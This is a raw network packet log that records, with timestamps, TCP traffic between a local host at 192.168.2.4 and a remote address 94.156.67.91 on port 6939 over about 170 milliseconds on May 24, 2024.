May 24, 2024 05:09:49.882783890 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.882822990 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.883057117 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.883068085 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.883075953 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.883085966 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.883111000 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.883150101 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.883716106 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.886013985 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.886081934 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.886148930 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.886269093 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.886292934 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.886310101 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.886383057 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.886655092 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.888520956 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.888530016 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.888582945 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.913189888 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.913285017 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.913417101 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.913570881 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.913579941 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.913588047 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.913726091 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.913726091 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.914218903 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.917963982 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.918090105 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.921348095 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.921410084 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.921606064 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.921655893 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.921665907 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.921674013 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.921709061 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.922158957 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.922168016 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.922312021 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.922322035 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.922396898 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.922537088 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.922548056 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.922555923 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.922595978 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.923096895 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.923105955 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.923115015 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.923150063 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.923150063 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.923634052 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.923644066 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.923651934 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.923660040 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.923667908 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.923676968 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.923692942 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.923692942 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.923728943 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.924457073 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.924468040 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.924520969 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.925760984 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.925771952 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.925813913 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.927042007 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.927057981 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.927067041 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.927074909 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.927100897 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.927134037 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.928356886 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.928366899 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.928409100 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.929621935 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.929631948 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.929673910 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.931763887 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.931775093 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.931783915 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.931818008 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.932739019 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.932748079 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.932898998 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.933409929 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.933419943 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.933428049 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.933437109 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.933459997 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.933501005 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.934345961 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.934398890 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.934700966 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.934712887 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.934720993 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.934729099 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.934737921 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.934755087 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.934787989 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.935695887 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.935707092 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.935714960 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.935754061 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.935754061 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.936621904 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.937607050 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.937772989 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.937819004 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.938106060 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.938155890 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.938493967 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.938505888 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.938551903 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.939107895 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.939117908 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.939161062 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.942199945 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.942210913 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.942255974 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.942326069 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.942692995 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.942851067 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.943016052 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.943109035 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.943116903 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.943157911 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.947155952 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.947165966 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.947213888 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.947325945 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.947482109 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.947670937 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.947681904 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.947719097 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.948327065 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.948338032 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.948345900 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.948380947 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.948982954 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.948992014 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.949033976 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.956150055 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.956267118 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.956471920 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.956629038 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.956638098 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.956789017 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.957314968 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.957325935 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.957372904 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.960110903 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.960119963 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.960167885 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.960419893 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.960608006 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.960619926 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.960961103 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.960971117 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.961021900 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.961580038 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.961589098 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.961627960 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.961962938 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.962001085 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.968290091 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.968528032 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.968672991 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.968790054 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.968796968 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.968803883 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.968975067 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.969726086 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.969784021 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.971436977 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.971446991 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.971493006 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.971561909 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.971980095 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.971988916 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.971998930 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.972034931 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.972069979 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.972913027 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.973227978 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.973290920 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.974993944 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.975073099 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.975123882 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.975318909 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.975327969 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.975370884 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.975616932 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.975626945 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.975649118 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.975667000 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.978003025 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.978058100 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.002207041 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.002322912 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.002468109 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.002646923 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.003019094 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.003029108 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.003037930 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.003047943 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.003163099 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.003163099 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.006954908 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.007013083 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.010484934 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.010632038 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.010770082 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.010925055 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.010936022 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.010945082 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.010974884 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.011699915 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.011709929 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.011718035 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.011729002 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.011746883 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.011775970 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.012496948 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.012507915 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.012516022 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.012545109 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.012589931 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.013248920 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.013257980 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.013266087 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.013312101 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.014523029 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.014573097 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.015193939 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.015202999 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.015245914 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.016463995 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.016474009 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.016524076 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.017770052 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.017780066 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.017816067 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.019040108 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.019049883 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.019057989 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.019085884 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.020658016 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.020668030 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.020677090 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.020705938 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.020736933 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.022254944 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.022264957 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.022308111 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.023255110 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.023263931 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.023304939 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.024247885 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.024262905 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.024271965 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.024279118 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.024315119 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.024343967 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.025198936 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.025208950 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.025253057 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.026181936 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.026190996 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.026232004 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.027148962 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.027158976 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.027165890 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.027173042 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.027200937 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.027226925 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.028140068 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.028150082 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.028191090 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.029179096 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.029187918 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.029227972 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.030102015 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.030112028 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.030118942 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.030147076 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.031088114 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.031097889 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.031141043 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.032059908 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.032068968 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.032114029 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.033049107 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.033057928 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.033066034 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.033075094 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.033098936 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.033123016 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.034019947 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.034032106 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.034073114 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.034993887 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.035003901 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.035048008 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.035970926 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.036036015 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.036453962 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.036464930 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.036514997 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.036953926 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.037446976 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.037456036 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.037463903 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.037496090 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.037518978 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.038397074 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.038938999 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.038948059 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.038990974 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.039895058 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.039943933 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.045277119 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.045506954 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.045559883 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.046005011 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.046550035 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.046561003 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.046717882 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.047487974 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.047499895 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.047548056 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.048966885 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.048978090 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.049027920 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.049235106 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.049280882 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:50.049706936 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.049717903 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:50.049773932 CEST	49737	6939	192.168.2.4	94.156.67.91
